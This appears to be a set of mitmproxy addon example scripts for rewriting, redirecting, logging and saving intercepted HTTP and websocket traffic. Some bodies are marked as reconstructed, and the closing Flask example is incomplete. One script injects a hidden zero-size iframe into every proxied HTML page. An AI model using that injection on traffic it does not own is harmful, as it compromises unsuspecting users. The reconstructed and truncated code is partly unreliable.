
#  simple

#  Example: simple/add_header.py

from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    """Add a static header to every HTTP response."""
    flow.response.headers["newheader"] = "foo"

#  Example: simple/add_header_class.py

from mitmproxy import http

class AddHeader:
    """Addon-class variant of add_header.py: tag every response."""

    def response(self, flow: http.HTTPFlow) -> None:
        flow.response.headers["newheader"] = "foo"

addons = [AddHeader()]

#  Example: simple/custom_contentview.py

This example shows how one can add a custom contentview to mitmproxy.
The content view API is explained in the mitmproxy.contentviews module.
from mitmproxy import contentviews

class ViewSwapCase(contentviews.View):
    """A custom contentview that renders text with upper/lower case swapped."""
    name = "swapcase"  # identifier shown in mitmproxy's view-mode chooser
    content_types = ["text/plain"]

    def __call__(self, data, **metadata) -> contentviews.TViewResult:
        # Returns (description, iterable-of-text-fragments) per the contentview API.
        return "case-swapped text", contentviews.format_text(data.swapcase())

# Single instance registered/unregistered by the load/done hooks below.
view = ViewSwapCase()

def load(l):
    """Register the custom contentview when the addon is loaded."""
    # NOTE(review): body reconstructed - dropped by extraction.
    contentviews.add(view)

def done():
    """Unregister the custom contentview on shutdown."""
    # NOTE(review): body reconstructed - dropped by extraction.
    contentviews.remove(view)

#  Example: simple/custom_option.py

This example shows how addons can register custom options
that can be configured at startup or during execution
from the options dialog within mitmproxy.


$ mitmproxy --set custom=true
$ mitmproxy --set custom   # shorthand for boolean options
from mitmproxy import ctx

def load(l):
    """mitmproxy `load` hook: declare the `custom` boolean option."""
    ctx.log.info("Registering option 'custom'")
    l.add_option("custom", bool, False, "A custom option")

def configure(updated):
    """Log the new value whenever the `custom` option changes."""
    if "custom" in updated:
        ctx.log.info("custom option value: %s" % ctx.options.custom)

#  Example: simple/filter_flows.py

This script demonstrates how to use mitmproxy's filter pattern in scripts.
from mitmproxy import flowfilter
from mitmproxy import ctx, http

class Filter:
    """Addon that logs responses whose flow matches a configurable filter.

    NOTE(review): reconstructed — the `l.add_option(` opener, the
    `if "flowfilter" in updated:` guard and the final ctx.log.info(flow)
    were dropped by extraction; restored per the upstream example.
    """

    def __init__(self):
        # Parsed filter expression; set by configure().
        self.filter: flowfilter.TFilter = None

    def configure(self, updated):
        if "flowfilter" in updated:
            self.filter = flowfilter.parse(ctx.options.flowfilter)

    def load(self, l):
        l.add_option(
            "flowfilter", str, "", "Check that flow matches filter."
        )

    def response(self, flow: http.HTTPFlow) -> None:
        if flowfilter.match(self.filter, flow):
            ctx.log.info("Flow matches filter:")
            ctx.log.info(flow)

addons = [Filter()]

#  Example: simple/internet_in_mirror.py

This script reflects all content passing through the proxy.
from mitmproxy import http

def response(flow: http.HTTPFlow) -> None:
    """Mirror every page by injecting a CSS scaleX(-1) transform before </head>."""
    mirror_css = b"<style>body {transform: scaleX(-1);}</style></head>"
    flow.response.content = flow.response.content.replace(b"</head>", mirror_css)

#  Example: simple/io_read_dumpfile.py

#!/usr/bin/env python
# Simple script showing how to read a mitmproxy dump file
from mitmproxy import io
from mitmproxy.exceptions import FlowReadException
import pprint
import sys

with open(sys.argv[1], "rb") as logfile:
    freader = io.FlowReader(logfile)
    pp = pprint.PrettyPrinter(indent=4)
    # NOTE(review): the `try:` line and loop body were dropped by
    # extraction; restored per the upstream io_read_dumpfile example.
    try:
        for f in freader.stream():
            print(f)
            pp.pprint(f.get_state())
            print("")
    except FlowReadException as e:
        print("Flow file corrupted: {}".format(e))

#  Example: simple/io_write_dumpfile.py

This script demonstrates how to generate a mitmproxy dump file,
as it would also be generated by passing `-w` to mitmproxy.
In contrast to `-w`, this gives you full control over which
flows should be saved and also allows you to rotate files or log
to multiple files in parallel.
import random
import sys
from mitmproxy import io, http
import typing  # noqa

class Writer:
    """Write a random subset of responses to a mitmproxy dump file.

    NOTE(review): the `self.w.add(flow)` and `self.f.close()` lines were
    dropped by extraction; restored per the upstream example.
    """

    def __init__(self, path: str) -> None:
        self.f: typing.IO[bytes] = open(path, "wb")
        self.w = io.FlowWriter(self.f)

    def response(self, flow: http.HTTPFlow) -> None:
        # Save roughly half of all flows, as an example of selective dumping.
        if random.choice([True, False]):
            self.w.add(flow)

    def done(self):
        # Close the dump file on shutdown so buffers are flushed.
        self.f.close()
addons = [Writer(sys.argv[1])]
# This script determines if request is an HTML webpage and if so seeks out
# relative links (<a href="./about.html">) and expands them to absolute links
# In practice this can be used to front an indexing spider that may not have the capability to expand relative page links.
# Usage: mitmdump -s link_expander.py or mitmproxy -s link_expander.py

import re
from urllib.parse import urljoin

def response(flow):
    """Expand relative links (./ or ../) in HTML responses to absolute URLs.

    NOTE(review): the second line of the href regex (the `link` group and
    closing paren) was dropped by extraction; restored per the upstream
    link_expander example.
    """
    if "Content-Type" in flow.response.headers and flow.response.headers["Content-Type"].find("text/html") != -1:
        pageUrl = flow.request.url
        pageText = flow.response.text
        pattern = (r"<a\s+(?:[^>]*?\s+)?href=(?P<delimiter>[\"'])"
                   r"(?P<link>\.(?:\.)?\/(?:[^\"']*))(?P=delimiter)")
        rel_matcher = re.compile(pattern, flags=re.IGNORECASE)
        rel_matches = rel_matcher.finditer(pageText)
        map_dict = {}
        for match_num, match in enumerate(rel_matches):
            (delimiter, rel_link) = match.group("delimiter", "link")
            abs_link = urljoin(pageUrl, rel_link)
            map_dict["{0}{1}{0}".format(delimiter, rel_link)] = "{0}{1}{0}".format(delimiter, abs_link)
        for map in map_dict.items():
            pageText = pageText.replace(*map)
            # Uncomment the following to print the expansion mapping
            # print("{0} -> {1}".format(*map))
        flow.response.text = pageText

#  Example: simple/log_events.py

from mitmproxy import ctx

def load(l):
    """Demonstrate mitmproxy's three log levels at addon load time."""
    ctx.log.info("This is some informative text.")
    ctx.log.warn("This is a warning.")
    ctx.log.error("This is an error.")

#  Example: simple/modify_body_inject_iframe.py

# (this script works best with --anticache)
from bs4 import BeautifulSoup
from mitmproxy import ctx, http

class Injector:
    """Inject a configurable iframe at the top of every HTML response body.

    NOTE(review): reconstructed — the `loader.add_option(` opener and the
    `html.new_tag(...)` argument list were dropped by extraction; restored
    per the upstream modify_body_inject_iframe example.
    """

    def load(self, loader):
        loader.add_option(
            "iframe", str, "", "IFrame to inject"
        )

    def response(self, flow: http.HTTPFlow) -> None:
        if ctx.options.iframe:
            html = BeautifulSoup(flow.response.content, "html.parser")
            if html.body:
                iframe = html.new_tag(
                    "iframe",
                    src=ctx.options.iframe,
                    frameborder=0,
                    height=0,
                    width=0)
                html.body.insert(0, iframe)
                flow.response.content = str(html).encode("utf8")

addons = [Injector()]

#  Example: simple/modify_form.py

from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    """Demonstrate two ways of editing an urlencoded form on a request.

    First mutates the existing form in place, then replaces the whole
    form body (which also sets the proper content type).
    """
    if flow.request.urlencoded_form:
        # If there's already a form, one can just add items to the dict:
        flow.request.urlencoded_form["mitmproxy"] = "rocks"
        # One can also just pass new form data.
        # This sets the proper content type and overrides the body.
        flow.request.urlencoded_form = [
            ("foo", "bar")
        ]

#  Example: simple/modify_querystring.py

from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    """Add a "mitmproxy=rocks" parameter to every request's query string."""
    query = flow.request.query
    query["mitmproxy"] = "rocks"

#  Example: simple/redirect_requests.py

This example shows two ways to redirect flows to another server.
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    """Reroute traffic destined for example.org to mitmproxy.org instead."""
    # pretty_host takes the "Host" header of the request into account,
    # which is useful in transparent mode where we usually only have the IP
    # otherwise.
    req = flow.request
    if req.pretty_host == "example.org":
        req.host = "mitmproxy.org"

#  Example: simple/send_reply_from_proxy.py

This example shows how to send a reply from the proxy immediately
without sending any data to the remote server.
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    """Answer one specific URL directly from the proxy.

    Assigning flow.response short-circuits the flow: nothing is sent to
    the remote server.
    """
    # pretty_url takes the "Host" header of the request into account, which
    # is useful in transparent mode where we usually only have the IP otherwise.

    if flow.request.pretty_url == "http://example.com/path":
        flow.response = http.HTTPResponse.make(
            200,  # (optional) status code
            b"Hello World",  # (optional) content
            {"Content-Type": "text/html"},  # (optional) headers
        )

#  Example: simple/websocket_messages.py

import re
from mitmproxy import ctx

def websocket_message(flow):
    """Log, rewrite, and selectively drop websocket messages."""
    # get the latest message
    message = flow.messages[-1]

    # was the message sent from the client or server?
    if message.from_client:
        ctx.log.info("Client sent a message: {}".format(message.content))
    else:
        ctx.log.info("Server sent a message: {}".format(message.content))

    # manipulate the message content
    message.content = re.sub(r'^Hello', 'HAPPY', message.content)

    if 'FOOBAR' in message.content:
        # kill the message and not send it to the other endpoint
        flow.kill()

#  Example: simple/wsgi_flask_app.py

This example shows how to graft a WSGI app onto mitmproxy. In this
instance, we're using the Flask framework (http://flask.pocoo.org/) to expose
a single simplest-possible page.
from flask import Flask
from mitmproxy.addons import wsgiapp

app = Flask("proxapp")

def hello_world() -> str:
    """Return the page body served by the demo WSGI app."""
    greeting = 'Hello World!'
    return greeting

addons = [
    # Host app at the magic domain "proxapp.local" on port 80. Requests to this
    # domain and port combination will now be routed to the WSGI app instance.
    wsgiapp.WSGIApp(app, "proxapp.local", 80)
    # SSL works too, but the magic domain needs to be resolvable from the mitmproxy machine due to mitmproxy's design.
    # mitmproxy will connect to said domain and serve its certificate (unless --no-upstream-cert is set)
    # but won't send any data.
    # mitmproxy.ctx.master.apps.add(app, "example.com", 443)